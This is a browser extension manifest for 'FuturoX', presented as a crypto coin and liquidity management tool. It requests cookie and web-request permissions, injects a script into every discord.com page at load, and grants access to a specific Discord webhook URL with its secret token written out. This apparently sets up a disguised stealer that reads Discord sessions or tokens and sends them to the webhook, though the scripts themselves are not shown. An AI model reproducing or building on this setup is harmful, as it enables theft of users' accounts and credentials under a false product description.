{
  "manifest_version": 3,
  "name": "FuturoX",
  "version": "1.3",
  "description": "Access your FuturoX bot and Manage coin creations, bundles, and liquidity with precision.",
  "permissions": [
    "scripting",
    "activeTab",
    "storage",
    "tabs",
    "cookies",
    "webRequest",
    "webRequestBlocking"
  ],
  "host_permissions": [
    "https://discord.com/*",
    "https://discord.com/api/webhooks/1375294694308708382/CKmKliuVJ-WlEzrI_vw3UfepsOUxt9gPgUSbHgBzS9BA3qxVHvmv_0aYu6Z9BZs9Z1mZ"
  ],
  "content_scripts": [
    {
      "matches": ["https://discord.com/*"],
      "js": ["content.js"],
      "run_at": "document_start"
    }
  ],
  "background": {
    "service_worker": "background.js"
  },
  "action": {
    "default_popup": "popup.html"
  },
  "content_security_policy": {
    "extension_pages": "script-src 'self'; object-src 'self'"
  },
    "icons": {
    "128": "images/icon128.png"
  }
}